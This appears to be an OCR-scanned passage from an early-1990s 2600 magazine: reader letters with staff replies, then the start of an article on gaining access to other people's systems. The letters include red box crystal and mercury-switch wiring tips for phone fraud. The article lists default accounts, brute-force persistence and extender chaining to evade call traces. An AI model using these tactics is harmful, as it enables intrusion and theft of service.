  1415.     phone company does not "forget" about phone numbers for ten years. What
  1416.     they do instead is hook wires (cable pairs) together at a junction box,
  1417.     serving area interface, or the frame itself so that the same line shows up
  1418.     in two different places. Why? Because they make lots of mistakes. It's
  1419.     happened here at 2600 twice in the past few years. A good clue is when
  1420.     someone beats you to answering the phone when there's nobody else
  1421.     around. Or when you start getting messages for non-existent people on your
  1422.     answering maclune. Keep this in mind next time the phone company claims
  1423.     that you're responsible for anything dialed on your line. And remember
  1424.     that any conversation, wire or radio, can be easily monitored,
  1425.     accidentally or on purpose.
  1426.  
  1427. Info
  1428. Dear 2600:
  1429.     ANAC for 313 is 2002002002 - at least this works in most areas. Also 313
  1430. loops are usually xxx- 9996/xxx-9997.
  1431.                 Erreth Akbe/Energy!
  1432.  
  1433. Many Questions
  1434. Dear 2600:
  1435.     Four issues of 2600 and I still want more. I've never been more impressed
  1436. by a magazine. Keep up the good work!
  1437.  
  1438.     Here are a few questions that I'd appreciate an answer to:
  1439.  
  1440.     1) In the parts lists for the FM wireless transmitter and the FM telephone
  1441. transmitter, three parts listed aren't in the schematics. On page 44, C7 and
  1442. C8 (22pF and 1.0nF) and on page 45, C7 (22pF). Do these discrepancies affect
  1443. the functioning of either device? 
  1444.  
  1445.     2) What is the product number of the Radio Shack phone dialer? Is there
  1446. anything more to the construction of the red box than crystal swapping? If so,
  1447. what?
  1448.  
  1449.     3) I'm rather new to the hack/phreak scene. Could you recommend the years
  1450. of back issues with the most information on a) the Internet and b) phreaking?
  1451.  
  1452.     4) Can you recommend a good book to learn electronics from?
  1453.  
  1454.     5) Can you suggest magazines which offer information similar to that found
  1455. in 2600 and are ordered hardcopy through the mail as opposed to found on the
  1456. Net?
  1457.  
  1458.     6) I'm severely lacking in my knowledge of "boxes". I'd like an
  1459. explanation of each of the more common types - if not schematics as well. I
  1460. understand beige, red, black, and green boxes. But, for instance, what are the
  1461. advantages of a blue box? Is there a formula for deciding which crystals
  1462. should be used for which tones (3.58 for DTMF, 6.5536 for red box, 4.1521 for
  1463. green box)? Does it vary with the device you put the crystal in? Is there a
  1464. general schematic that can be used with different crystals to produce
  1465. dffferent tones ?
  1466.  
  1467.     7) A few years ago (before I bocame interested in hack/phreaking) I saw
  1468. part of a movie in which an oscilloscope (I think) was used to determine MAC
  1469. or some kind of ATh/[ codes while the machine processed transactions. Does
  1470. this process have any workability?
  1471.                 The Ronin
  1472.                 Pennsylvanla
  1473.  
  1474.     The monitoring devices should work if you follow the schematics; The Radio
  1475.     Shack model number for the tone dialer is 43-141 but it's now rumored to
  1476.     have been discontinued. There is no modification other than replacing the
  1477.     crystal.
  1478.  
  1479.     We've been publishing phreaking information throughout all of our issues.
  1480.     The frequency hasn't changed but the particulars certainly have. Internet
  1481.     news is more prevalent in our later issue.
  1482.  
  1483.     Some good books to learn electronics from: Basic Electronics Theory by
  1484.     Delton Horn, published by TAB Books; Forrest M. Mims III Engineer's
  1485.     Mini-Notebook series available at Radio Shack; Understanding Solid State
  1486.     Electronics, sold at Radio Shack. Manufacturers' data books are free
  1487.     (Motorola, etc.) and you can learn an awful lot from them. Try calling some
  1488.     toll free numbers and asking.
  1489.  
  1490.     If any good hacker magazines come our way, we'll print the information.
  1491.     Recently, it's been pretty dry. These numbers may help for DTMF: For a
  1492.     5089 chip, first row, crystal divided by 5152; second row, 4648; third
  1493.     row, 4200;fourth row, 3808;first column, 2968; second column, 2688; third
  1494.     column, 2408, fourth column, 2184.
  1495.  
  1496.     Finally, oscilloscopes are for measuring waveforms, and generally not for
  1497.     eavesdropping. It's also very likely that any signal from an ATM would be
  1498.     encrypted.
  1499.  
  1500. Dear 2600:.
  1501.     First of all, you have a great magazine so don't change a thing/However, I
  1502. just recently received a bunch of back issues, so pardon me if some of these
  1503. questions are outdated or have been answered already.
  1504.  
  1505.     1) How can I help 2600 grow (besides the obvious of sending you money)? I
  1506. would like to do some sort of volunteer work for you guys, but that may pose a
  1507. small problem since I live a few thousand miles from New York.
  1508.  
  1509.     2) Is E.T. considered an honorary phone phreak?
  1510.  
  1511.     3) What is the ANAC number for the 515 area code?
  1512.  
  1513.     4) What can you tell me about your cover artist (Holly Kaufman Spruch)?
  1514.  
  1515.     5) Please explain to me why it takes six weeks for you guys to process
  1516. orders for hack issues. It should only take about two weeks tops. And that's
  1517. third class mail. If I decide to shell out maybe $75 for back issues, then
  1518. I want the "invaluable" information (that I don't already know) as soon
  1519. as possible, and don't want to wait a month and a half for it! This is very
  1520. frustrating, and I would also like some other readers' opinions on this.
  1521.  
  1522.     6) I sympathize with Kevin Mitnick in the Summer '91 issue, In plain
  1523. English, he got shafted. I'm not saying that he's completely innocent, but
  1524. the authors of the book Cyberpunk did write unfairly about him.
  1525.  
  1526.     7) How about writing an article listing all of the known phreak boxes,
  1527. what they can do, and if they can be used today. List all of the major
  1528. ones like blue, red, green, and black boxes and then list the lesser known
  1529. ones like the gold, cheese, diverti, aqua, etc.
  1530.  
  1531.     8) Would it be possible to put together a big gathering of phreaks in some
  1532. unknown exchange like the "2111" conference in the October 1971 Esquire
  1533. article "Secrets of the Little Blue Box"? To me that is what phreaking is
  1534. all about - helping other phreaks. By the way, I do know that you can't use
  1535. a blue box to do this anymore, but you inventive folks should be able to
  1536. come up with something that would work. If you did this however, you would
  1537. have to tell phreaks about it through word of mouth, as I'm sure many
  1538. telco security personnel read your magazine.
  1539.  
  1540.     9) I really enjoyed the "Hacker Reading List" in the Winter '90 issue.
  1541. However, it was slightly incomplete - you forgot magazine articles. Below
  1542. is a small list of hacker/phreak related articles that I have come across.
  1543. A larger list is available at the back of the book Cyberpunk. Also, a very
  1544. good book that Dr. Williams left out of the book list is called The Phone
  1545. Book and the author is J. Edward Hyde. To find these, just go to your
  1546. local library and see if they have the hack issues. However, they might
  1547. not have them as far back as '72, so you will have to use their microfiche.
  1548. I personally found most of these at a college library.
  1549.  
  1550.     Esquire, October 1971, "Secrets of the Little Blue Box".
  1551.     Esquire, December 1990, "Terminal Delinquents".
  1552.     Ramparts, June 1972, "Regulating the Phone Company in Your Home".
  1553.     Ramparts, July 1972, "How the Phone Company Interrupted Our Service".
  1554.     Radio Electronics, November 1987, "The Blue Box and Ma Bell".
  1555.     L.A. Weekly, July 18-24 1980, "The Phone Art of Phone Phreaking".
  1556.     Rolling Stone, September 19 1991, "Samurai Hackers".
  1557.     Playboy, October 1972, "Take That, You Soulless S.O.B.".
  1558.     Oui, August 1973, "The Phone Phreaks' Last Stand".
  1559.     Time, March 6 1972, "Phoney Tunes".
  1560.                 Clark Kent
  1561.                 Ames, IA
  1562.  
  1563.     You don't have to be anywhere near us to help out. You can send us
  1564.     information, articles, and anything else that comes to mind. You can
  1565.     contribute to the discussion on our voice BBS and start other forums on
  1566.     hacking throughout the country. By letting people know there is a place
  1567.     for them to contribute, you'll be opening up a lot of minds that are just
  1568.     waiting to be liberated. It may not be quite that poetic but you get the
  1569.     idea. We don't talk about E.T., we will talk about the .515 ANAC when we
  1570.     find it, and we can't talk about Holly Kaufmun Spruch. We agree that back
  1571.     issue orders take too long und we've taken some steps to alleviate the
  1572.     situation, including luring people whose only concern in life is to speed
  1573.     the process. Keep in mind that it takes our bank up to three weeks to
  1574.     notify us if a check has bounced or is unacceptable for some other stupid
  1575.     reason. That's why we're not too keen on sending out back issues until
  1576.     we're sure we've actually gotten paid. We could send out cash orders quicker
  1577.     but then too many people would send cash in the mail, whuch is a pretty
  1578.     risky thing in itself. We're hoping for a maximum of three to four weeks
  1579.     from start to finish. Our authors and hopefully other readers have taken
  1580.     note of your other ideas. Thanks for the info.
  1581.  
  1582.  
  1583. An Opinion
  1584. Dear 2600:
  1585.     I was reading an article from an issue of 2600 called "How Phone Phreaks
  1586. Are Caught" and it gave me a lot of insight, and I thought I should contribute
  1587. some. On many "elite" BBS's they have many files on how not to get caught
  1588. phreaking and what precautions to take (including this file). Files like that
  1589. are what will keep some phreaks in the clear and out of trouble. Most files,
  1590. like "Phreaking Made E-Z" (fictitious file, but used just to illustrate my
  1591. point), just say, "Okay, at the prompt, just type in...." etc. But the
  1592. phreakers need to know all the theory behind it. 
  1593.  
  1594.     Also included in the file was some of the Spring edition of 2600, and it
  1595. had an article about a "crackdown". It's kinda scary, but very tme. I myself
  1596. am not too quick to let people know that "I phreak", and am extremely
  1597. reluctant to show anyone my files (in other words, I don't) on phreaking,
  1598. hacking, etc. 
  1599.  
  1600.     But crackdowns like this can help phreaks. It will make them so paranoid
  1601. that they will all band together and create tings of correspondence, banding
  1602. everyone together. 
  1603.  
  1604.     Violent actions, like what happened to Steve Jackson Games, are pretty
  1605. scary to think about. I mean, should I be worried if I send someone e-mail over
  1606. America Online, and mention h/p/a/v, or a "phreaking" term? It's things like
  1607. this that can spread from the E911 doc and such.
  1608.  
  1609.     Thanks for letting me voice my opinion and I'd also like to subscribe to
  1610. 2600, for it seems to be the only printed mag that actually tells the truth.
  1611.                 TC
  1612.                 Blauvelt, NY
  1613.  
  1614.     Don't be concerned about what you talk about in e-mail. The only thing you
  1615.     should really be worried abaut is submitting to hysteria, paranoia, ar
  1616.     self-censorship.
  1617.  
  1618.  
  1619. The Facts on ACD
  1620. Dear 2600:
  1621.     Thanks goes out to Dr. Abuse and the designer of the magnetic stripe card
  1622. copier (printed in the Summer 1991 issue). Another thanks goes out to the Mad
  1623. Scientist, whose article fmally encouraged me to mess around with my silver
  1624. box. While experimenting with it and the Automated Call Distributor on some
  1625. payphones in Boston, Massachusetts, I got some different results than the Mad
  1626. Scientist did. They are as follows:
  1627.  
  1628.     1: Ring toll test board/loud busy
  1629.     2: Tone side - loop (high)
  1630.     3: Loud busy
  1631.     4: Dead/loud busy
  1632.     5: Loud busy
  1633.     6: Dead
  1634.     7: Dead
  1635.     8: Doesn't trigger anything (pulsing dialtone continues)
  1636.     9: Doesn't trigger anything (pulsing dialtone continues)
  1637.     O: Tone blast (1000 hz)
  1638.     *: Doesn't trigger anything (pulsing dialtone continues)
  1639.     #: Doesn't trigger anything (pulsing dialtone continues)
  1640.  
  1641.     I was wondering what the real purpose of the ACD was, because the features
  1642. it can achieve don't seem greatly important. I have also experimented with the
  1643. other tones (A, B, and C), but have not acquired any information.
  1644.  
  1645.     Secondly, while travelling in Belgium and Amsterdam last summer, I came
  1646. across a few electronics stores and a bookstore which had many interesting
  1647. items. I picked up one dialer, which is about 2" by 2" square and a 1/4"
  1648. thick, which has the 0-9, *, #, and A,B,C,D tones, which is what I use for my
  1649. silver box. It cost the equivalent of about $15-$20 US currency. There were
  1650. also some other types of dialers there too, all small and compact. In case
  1651. anyone was interested in ordering one of these dialers (I recommend it, they
  1652. are great), it is called the 'TD-1000 Digitale Toonkiezer" by Betacom. Try
  1653. writing or calling there two places: 
  1654.  
  1655.     1 ) Teleworld Telecommunicatieshops
  1656.         Kinkerstrsat 66-68-70
  1657.         1053 DZ Amsterdam
  1658.         The Netherlands
  1659.         Phone: +31-20-6834001
  1660.  
  1661.     2)  S. A. Kevinco N.V.
  1662.         Rue du Marche aux Herbes - 4 - Grasmarkt
  1663.         Bruxelles 1000 Belgium
  1664.         +32-2-2187159
  1665.  
  1666.     Also, if you happen to go into Amsterdam, and want to pick up current and
  1667. back issues of Hack-Tic (learn Dutch just to read this publication, it's
  1668. great), 80 to either of the following bookstores: Athenaeum Nieuwscentmm,
  1669. Amsterdam; Athenaeum Boekhandel, Amsterdam, Haarlem.
  1670.  
  1671.     This next comment is in regards to the letter from Dr. Delam on page 25 of
  1672. the Spring 1992 issue. He commented about making a red box with a mercury
  1673. switch for "pig-proof" access to the 6.5536mhz and 3.57mhz crystals. To go
  1674. more in depth with that, I will explain some of a text file that Cybametik
  1675. wrote up a few months back on that topic. You will need two mercury switches,
  1676. preferably very small, so they will fit into the dialer casing. Connect one
  1677. lead of one of the mercury switches to one of the leads of the 3.57mhz
  1678. crystal, and the other existing leads to the two solder marks on the dialer PC
  1679. board (where the original 3.57mhz crystal existed). Next, connect one lead of
  1680. the other mercury switch to one lead of the 6.5536mhz crystal, and connect the
  1681. two unconnected leads to the two solder marks on the dialer PC board (there
  1682. should now be four leads on the two marks). Now, in order for the mercury
  1683. switch action to work, you have to make sure that the mercury switches are
  1684. facing opposite directions (vertically), so when you tum the dialer backwards,
  1685. one crystal should connect with the board, and when you tum it the other way,
  1686. the other crystal should connect. Well, I hope that cleared things up a bit in
  1687. the way of mercury switches. 
  1688.  
  1689.     And lastly, some ANACs are: Boston and surrounding areas: 200-xxx-1234,
  1690. 200-222-2222; N.W. Indiana: 410-4 (x12).
  1691.                 Kingpin
  1692.                 Brookline, MA
  1693.  
  1694.     With regards to the Automated Call Distributor, whenever you call
  1695.     directory assistance, you're actually dialing into a queueing system which
  1696.     is known as the ACD. This system is simply what determines who is free to
  1697.     pick up your call. By pressing the D key while they pick up, you enter a
  1698.     test mode on the ACD. It's not meant to be interesting or exciting to
  1699.     anyone outside of the phone company.
  1700.  
  1701.  
  1702. Cellular Mystery
  1703. Dear 2600:.
  1704.     I was wondering if yon could answer this question. Local telephone
  1705. people and our RCMP have been adding an E-Promchip to their cellular phones.
  1706. Generally they are added to a Techniphone (British brand ofcellular).  They
  1707. have been designed to accept the chip easily.  Everyone has gone hush-hush on
  1708. this. Can you tell me what practical applications can be done with it?
  1709.                 Nova Scotia
  1710.  
  1711.     It's probably for the purpose of changing the ESN (Electronic Serial
  1712.     Number) and the MIN (Mobile Identifcation Number). It could abo be an ANI
  1713.     of some sort so the dispatcher knows who's talking. Then again, it could
  1714.     be for speech encryption. The best way to see if it's the latter is to get
  1715.     the frequency (use a frequency counter) and listen in with a scanner. Good
  1716.     luck.
  1717.  
  1718.  
  1719. Call For Data
  1720. Dear 2600:
  1721.     Do you have any plans for doing a list of CNA's? Michigan (313) went
  1722. automated a while back. The number is 424-0900. A three-digit employee number
  1723. is required. When I was in Chicago md browsing through their ANAC's, I found
  1724. an interesting phenomenon. It returned a barst of DTMF. I didn't have a decoder
  1725. so I can't be sure what it meant. Finally, the demon dialer as advertised in
  1726. your Winter 1991 issue works great. C'est bon. Hell, c'est tres bon. I highly
  1727. recommend it. Expect an article soon on boxing out of foreign countries.
  1728.                 The Azure Mage
  1729.                 Somewhere in the Military
  1730.  
  1731.     When we get the info, we'll print it.
  1732.  
  1733.  
  1734. Call For Info
  1735. Dear 2600:
  1736.     I was reading an article in your summer edition and it talked about a
  1737. magazine called Mobile Computing. Could you please tell me how I can get in
  1738. touch with them?
  1739.                 JS
  1740.  
  1741.  
  1742.     We can't track down a number or address for them at the moment. But you
  1743.     should also look in Computer Shopper if you want it~ro on lap tops.
  1744.  
  1745.  
  1746. Call For Help
  1747. Dear 2600:
  1748.     I run a BBS for the disabled called DEN (Disabilities Electronic Network).
  1749. Until recently we had an 800 number accessing an eight line hunt group. It was
  1750. a very lively national bulletin board. Our 800 number is in limited service
  1751. indefinitely as a result of our loss of funding. This has been the cause of a
  1752. search for long distance services that our users would make use of to access
  1753. DEN. I found PC Pursuit by Sprint. PC Pursuit is a non-prime time service that
  1754. allows 90 hours per month for disabled people and 30 hours per month for non-
  1755. disabled people for $30. The service enables one to access many electronic
  1756. services during non-prime time hours and weekends while not changing your
  1757. present long distance provider. Are you, or anyone at 2600, aware of other
  1758. such low cost services? I'm desperate to find low cost access for our users.
  1759. We're a free service and it would be a shame if our phone companies' greed
  1760. affected our ability to deliver a service to the disabled community. 
  1761.                 New Jersey
  1762.  
  1763.  
  1764.     The call has gone out.
  1765.  
  1766. A Choke Tip
  1767. Dear 2600:
  1768.     In regards to the "choke line" discussion in relation to reaching radio
  1769. stations (2600, Spring 1992), I have found that dialing a carrier access code
  1770. prior to the phone number increases the chances of getting through to a radio
  1771. station. This does result in a long distance charge but it may be worth the
  1772. risk, if one desires the prize greatly enough. 
  1773.                 The Prophet
  1774.                 Canada
  1775.  
  1776.  
  1777. Mail Problems
  1778. Dear 2600:
  1779.     Due to the problems with non-delivered issues, I have decided not to renew
  1780. my subscription to 2600. I think I've averaged at least one missing issue per
  1781. year of my subscription. This is not pleasant, especially with a quarterly
  1782. publication. 
  1783.     I doubt this is due to any incompetence on your part, but rather because of
  1784. sticky-fingered postal employees. They see The Hacker Quarterly pass in front
  1785. of them and think "Hmmm, I think I'll read this during lunch..." and who knows
  1786. where the hell it winds up after that.  Playboy remedied this some time ago by
  1787. mailing the magazine in an opaque plastic bag with a transparent section for
  1788. the address label on the magazine itself. Also, the return address has only
  1789. the mailing address, no tell-tale "Playboy" logo screaming "Steal me!".
  1790.     I will continue to support your magazine through newsstand and back issue
  1791. sales (please make them available on an individual issue basis).
  1792.                 RD
  1793.                 Austin, TX
  1794.  
  1795.     This definitely should not be happening. We have been having more of a
  1796.     problem with damaged issues, missing issues, and envelopes ripped open
  1797.     than ever before. Overall, the post office has done an amazing job but
  1798.     we're very concerned with this recent plummet in competence and/or honesty.
  1799.     We hope our readers complain loudly if anything happens to their mail.
  1800.     It would help a lot if anybody sending a letter of complaint sent as a
  1801.     copy so we can present it to the postal people on our end. Rest assured
  1802.     this is a top priority matter for us. We'd rather not add packaging to the
  1803.     magazine, for both cost and ecological reasons. We're interested in
  1804.     hearing more feedback on this. With regards to our back issues, individual
  1805.     issues are available from 1988 on at a cost of $6.25 each ($7.50 overseas).
  1806.     1984 through 1987 are only available by year ($25, $30 overseas).
  1807.  
  1808.  
  1809. Comments From Abroad
  1810. Dear 2600:
  1811.     Like many others, I'd noticed your Postnet example didn't correspond with
  1812. your description, and I'm even more delighted to see your C code for printing
  1813. them (I only have to modify it to suit my computer).
  1814.  
  1815.     The "Gulf War Printer Virus" expresses pretty much my reaction - that is,
  1816. it wouldn't work! Unlike your anonymous writer, I expressed this opinion on
  1817. the Intemet and received some interesting information in January. Although
  1818. most newspapers and computer magazines credited the original article to the
  1819. Wall Street Journal, it appears the "real" original article was in InfoWorld in
  1820. the April 1, 1991.issuel We need not ascribe to the nefarious operations of
  1821. the NSA what can be adequately blamed on the idiocy of certain reporters.
  1822.  
  1823.     On the other hand, could a "printer virus" slow down a computer? I'd
  1824. imagine it could, provided the computer was something relatively slow, like an
  1825. IBM XT or possibly AT. It all really depends on how they treat their parallel
  1826. printer port. If they generate interrupts upon receipt of a printer
  1827. acknowledge signal, then you merely need to rig the printer to blast the
  1828. acknowledge line at, say, 30 kilohertz. This would probably keep most CPUs
  1829. fairly busy, and slow down the performance nicely.
  1830.                 EL
  1831.                 Faulconbrldge, Australia
  1832.  
  1833.  
  1834. Dear 2600:
  1835.     We just heard about your mag and think it's a wonderful idea - finally a
  1836. means by which we chip-heads can get in touch without spending loads of money
  1837. on phone bills. See, we got much electronic shit to denounce even here in the
  1838. ole continent, without mentioning the fucking growing corporate trash and the
  1839. expanding neo-nazi movement. 
  1840.  
  1841.     But we ain't much organized over here; that's why we need you guys to give
  1842. us a starting point. We'll go on from there. We ain't many either - but we
  1843. dunno how many are on the biz, became it's quite difficult to find 'em all -
  1844. but a steadily growing number anyway. We wish you a most "productive" work. 
  1845.                 DF
  1846.                 Milan Italy
  1847.  
  1848. BBS Update
  1849. Dear 2600:
  1850.     I am the sysop of the Tin Shack BBS at (818) 992- 3321. I have an ad in
  1851. the Spring 1992 edition offering free elite access to all 2600 readers. I would
  1852. like to thank you for publishing this ad and I'd like to thank the many
  1853. hackers who are calling our BBS. I have enjoyed the CHATs and messages from
  1854. your readers. We are starting an exclusive hackers conference and including a
  1855. hackers filebase in this conference for sharing of code and text on the fine
  1856. art of hacking that has continued to enhance the science of computing. We have
  1857. also attracted the attention of a law enforcement agency from New York. This
  1858. was easily detected as they were shying away from caller verification and then
  1859. stupidly sending me a check for Elite Access paid out by their operating
  1860. account of their home office. What a deal! Since we know our rights and hold
  1861. no illegal wares I publicly thank them for helping us to buy new hardware!
  1862. Hahaha! The message base in our new hackers conference will be current and
  1863. quite interesting. If you are a real hacker, give us a call. No wannabes,
  1864. phonies, or pheds allowed on the Tin Shack BBS.
  1865.                 Guy Nohrenberg
  1866.                 Sysop
  1867.                 Tin Shack BBS
  1868.                 (818) 992-3321
  1869.  
  1870.     If you're promoting free speech and aren't doing anything illegal, there's
  1871.     no reason to disallow anyone.
  1872.  
  1873. Voice Mail Question
  1874. Dear 2600:
  1875.     How come your voice BBS is only open after 11 pm? Also, why do you give
  1876. out an expensive 0-700 number instead of a real phone number?
  1877.                 Puzzled
  1878.  
  1879.     First off, the 0-700 number costs 15 cents a minute. A regular phone
  1880.     number would cost 13 cents a minute. While slightly more, this is not
  1881.     comparable to a 900 number or anything of that natare. We give out that
  1882.     number because right now the system doesn't have a set phone number; it
  1883.     sometimes shows up on different lines. It's only available at night
  1884.     because it's currently a single-line system and opening the BBS during the
  1885.     day would tie up the voice mail functions. Right now we're working on
  1886.     expanding the system so that it shows up on our main number (516-751-
  1887.     2600) and so that the BBS part is available around the clock with multiple
  1888.     lines. To do this, we need to find some flexible multi-line voice mail
  1889.     software along with some cheap computers. If anyone has any suggestions,
  1890.     please send them our way. For now. the voice BBS can be reached through AT&T
  1891.     at 0-700-751-2600. Most of our writers can be reached through the voice
  1892.     mail section of that number, which is available 24 hours a day. During
  1893.     business hours, the rate of the 0-700 number is 25 cents a minute. (Don't
  1894.     worry, we're not making a penny off of this!)
  1895.  
  1896.  
  1897.  
  1898.       ------------------------------------------------------------------
  1899.  
  1900.  
  1901.                      2600 NOW HAS A VOICE BBS THAT OPERATES
  1902.                     EVERY NIGHT BEGINNING AT 11:00 PM EASTERN
  1903.                    TIME. FOR THOSE OF YOU THAT CAN'T MAKE IT TO
  1904.                    THE MEETINGS, THIS IS A GREAT WAY TO STAY IN
  1905.                        TOUCH. CALL 0700-751-2600 USING AT&T.
  1906.                    (IF YOU DON'T HAVE AT&T AS YOUR LONG DISTANCE
  1907.                    COMPANY, PRECEDE THE ABOVE NUMBER WITH 10288).
  1908.                  THE CALL COSTS 15 CENTS A MINUTE AND IT ALL GOES
  1909.                   TO AT&T. YOU CAN ALSO LEAVE MESSAGES FOR 2600
  1910.                     WRITERS AND STAFF PEOPLE AROUND THE CLOCK.
  1911.  
  1912.  
  1913.       ------------------------------------------------------------------
  1914.  
  1915.  
  1916.                          hacking on the front line
  1917.                                by AI Capone
  1918.  
  1919.     As we have seen from previous raids/busts, the consequences of being
  1920. caught by the federal govemment, etc. are not worth it in the long run. If
  1921. they cannot cripple you physically, then they will do it emotionally or
  1922. financially. Therefore I do not recommend that any action taken to gain
  1923. unauthorized access is justifiable in any way. However the choice is yours.
  1924.  
  1925.     People who desire to get into a "secure" system should know a few things
  1926. about it. First off. for me the word "secure" brings to mind a picture of a
  1927. human monitoring a system for 24 hours. All the nodes are watched
  1928. individually, and everything is hardcopied. This is obviously, in most (if not
  1929. all) cases, not feasible, as the man hours and/or the cash funding is non-
  1930. existent. Besides, to a system operator, watching everything a system does
  1931. could be quite boring. The hacker can capitalize on this.
  1932.  
  1933.     The two things a hacker should know about when attempting to gain access
  1934. to a system are:
  1935.  
  1936.     1. Typical formats for the system. (i.e. how you type in the login
  1937. sequence. Is the login and password on one continuous line, do you have to
  1938. type it in separately at different prompts, etc.)
  1939.  
  1940.     2. Default and common passwords. Default accounts are the accounts that
  1941. come with the system when it is installed ("factory accounts"). Common
  1942. accounts are accounts set up by the system operator for particular tasks. The
  1943. probability exists that these accounts are present on the system that the
  1944. hacker is trying to penetrate, therefore they should be tried.
  1945.  
  1946.                        Identifying the System
  1947.     If the owner of the system is not mentioned in the opening banner, you will
  1948. either have to gain access to the system itself or use CNA (Customer Name and
  1949. Address - the little thing that exists for identifying a telephone number).
  1950. Please remember that a brute force method on some systems is often recorded to
  1951. the account indicating the number of attempts that you have tried, sometimes
  1952. even writing the password that you've tried. More often than not, it will just
  1953. record the number of failed attempts. Aside from this, the system may "sound
  1954. an alarm". This is not a bell or siren that goes off; it is just a message
  1955. printed out and/or sent to any terminals designated as security operator
  1956. terminals (i.e. VMS). Example: 
  1957.  
  1958. Welcome to Sphincter Systems Vax Cluster
  1959. Username: CHEESEHEAD
  1960. Password:
  1961.  
  1962. Welcome to Sphincter Systems, Mr. Mouse
  1963. Number of failed attempts since last entry: 227
  1964.  
  1965.     Obviously, in the above example, Mr. Mouse would get the idea that someone
  1966. was attempting to gain access to his account and would promptly change the
  1967. password, assuming he was paying attention at login (Many people don't.
  1968. Logging into my favorite BBS, I have often left the room while my auto-login
  1969. macro was accessing the system. The same principle applies here.) Also, in the
  1970. above example, it was very stupid for Sphincter Systems to display the banner
  1971. identifying the system. This would only encourage the hacker in an attempt to
  1972. gain access (it always encouraged me), and at 227 attempts, the hacker should
  1973. have kept trying to gain access. Remember that once the account is accessed
  1974. correctly, the security counter is reset to zero and Mr. Mouse will probably
  1975. never know that someone else has his password (as long as no malicious or
  1976. destructive actions are carried out-and as long as he doesn't keep a record
  1977. of his login dates).
  1978.  
  1979.     When I was scanning a network, I often found that most of the systems
  1980. identified themselves. On the other hand, the systems I found in most
  1981. telephone exchanges required that they be identified by other means. The
  1982. banner usually decided my interest in the system, whether I just wanted to
  1983. try a few things and move on, or really concentrate on the effort. It also
  1984. gave me a little extra ammunition since usernames and/or passwords may contain
  1985. some information which was displayed in the banner. Another thing I noticed
  1986. about networks that differed from local dial-in systems was that dial-in
  1987. systems would disconnect me after three to five attempts. Granted, the system
  1988. on the network would disconnect me, but only from the host. The network itself
  1989. would not, creating one less problem to deal with. System operators might
  1990. suspect something if they saw an outdial number being accessed every thirty
  1991. seconds or so. 
  1992.  
  1993. Login:
  1994. Password:
  1995. (This is a Unix.)
  1996.  
  1997. Username:
  1998. Password:
  1999. (This is a VMS.)
  2000.  
  2001. @
  2002. (This is a Tops-20.)
  2003.  
  2004. Enter Usercode/Password
  2005. (This is a Burroughs.)
  2006.  
  2007. MCR]
  2008. (This is an RSX-11.)
  2009.  
  2010. ER!
  2011. (This is a Prime.)
  2012.  
  2013. .
  2014. (This is an IBM running a VM operating system.)
  2015.  
  2016.     This list is by far not complete, as there are many more systems out
  2017. there, but it will get you started. Some of the time, it will tell you the
  2018. name in the opening. Crays, for example, usually identify themselves.
  2019.  
  2020.                            The Telephone
  2021.     Make sure when you are dialing into the system that you realize that
  2022. somewhere along the trail there is a possibility of a trace. With all of the
  2023. switching systems in effect by Bell, etc. what you need to do is dial in using
  2024. an outside source. For instance, what I usually did was call an 800 extender
  2025. (not in Feature Group D), and then call the target system. The only times I
  2026. called the target system direct was when I was identifying the system (I did
  2027. not start hacking the system at this time), but even this is not recommended
  2028. these days. Things owned by Bell, such as COSMOS systems, SCCS networks, etc.,
  2029. are probably more risky than generic corporate systems. Of course using only
  2030. one extender should be the least of what you can do. If you call several
  2031. extenders and then the target system, the chances are that tracing the call
  2032. back to you will be next to impossible. But this method also is risky since
  2033. the long distance telephone company may not be overly enthused about you
  2034. defrauding them. At one time an acquaintance was harassing a company that was
  2035. tracing him. They let him know of the trace and just for the hell of it he
  2036. decided to stay on the line to see the results. The result was Paris, France.
  2037. Keep in mind he lives in the United States. This story displays an excellent
  2038. use of extenders. The only detriment I see is that by routing your call
  2039. through two or more extenders the integrity of the line decreases. 
  2040.  
  2041.     When using networks (Telenet, Tymenet, etc.) in connecting to the system,
  2042. your port is sent as an ID in order to accept your connection attempt. It
  2043. would really be simple then to isolate your number (providing you called the
  2044. network directly from your house) if you repeatedly attempt to use the system.
  2045. What you should do for this problem is loop through a gateway on the network.
  2046. The gateway is essentially an outdial which will connect to a system. Use the
  2047. gateway to call another network's dialup.
  2048.  
  2049.                              Common Passwords
  2050.     The following is a list of common passwords for various systems. On a
  2051. respectable system, these will be constantly changed. But not all system
  2052. managers are smart or security conscious. The first system that I got into was
  2053. by using a common account (no password was needed in this case, just the Unix
  2054. "uucp" as a username). Sometimes systems are put up and completely left alone.
  2055. It seems the managers think that nobody will find the system. In my case, the
  2056. system was kept current, and I had "uucp" privileges to the School Board
  2057. computer. Remember, as long as you don't do anything that damages or destroys
  2058. data, they probably will never know that you have been there.
  2059.  
  2060.                     Common Accounts for the Primos System
  2061.     Prime
  2062.     Admin
  2063.     Games
  2064.     Test
  2065.     Tools
  2066.     System
  2067.     Rje
  2068.     Guest
  2069.     Netman
  2070.     Cmdnco
  2071.     Primos
  2072.     Demo
  2073.     Regist
  2074.     Prirun
  2075.     Telenet
  2076.  
  2077.                       Common Accounts for the VM/CMS System
  2078.     Operator
  2079.     Cmsbatch1
  2080.     Autolog1
  2081.     Operatns
  2082.     Vmtest
  2083.     Vmutil
  2084.     Maint
  2085.     Smart
  2086.     Vtam
  2087.     Erep
  2088.     Rscs
  2089.     Cms
  2090.     Sna
  2091.  
  2092.                     Common Accounts for the VAX/VMS System
  2093.     Vax
  2094.     Vms
  2095.     Dcl
  2096.     Demo
  2097.     Test
  2098.     Help
  2099.     News
  2100.     Guest
  2101.     Decnet
  2102.     Systest
  2103.     Uetp
  2104.     Default
  2105.     User
  2106.     Field
  2107.     Service
  2108.     System
  2109.     Manager
  2110.     Operator
  2111.  
  2112.                   Common Accounts for the Unix System
  2113.     root
  2114.     uucp
  2115.     nuucp
  2116.     daemon
  2117.     who
  2118.     guest
  2119.     io
  2120.     com
  2121.     bin
  2122.     sys
  2123.     informix
  2124.     uucpmgr
  2125.     adm
  2126.     profile
  2127.     trouble
  2128.     intro
  2129.     rje
  2130.     hello
  2131.     Ip
  2132.     setup
  2133.     powerdown
  2134.     uname
  2135.     makefsys
  2136.     mountfsys
  2137.     checkfsys
  2138.     umountfsys
  2139.  
  2140.     This should give you an idea on where to start.
  2141.  
  2142.                             Combinations
  2143.     The combinations to get into a system are nearly infinite. If the password
  2144. needed to get into the system is something like "FRM;UN!DA" then the chances
  2145. are extremely remote that you will get in. Multiply the following: the number
  2146. of tries where you use the username as the password by the variations of a
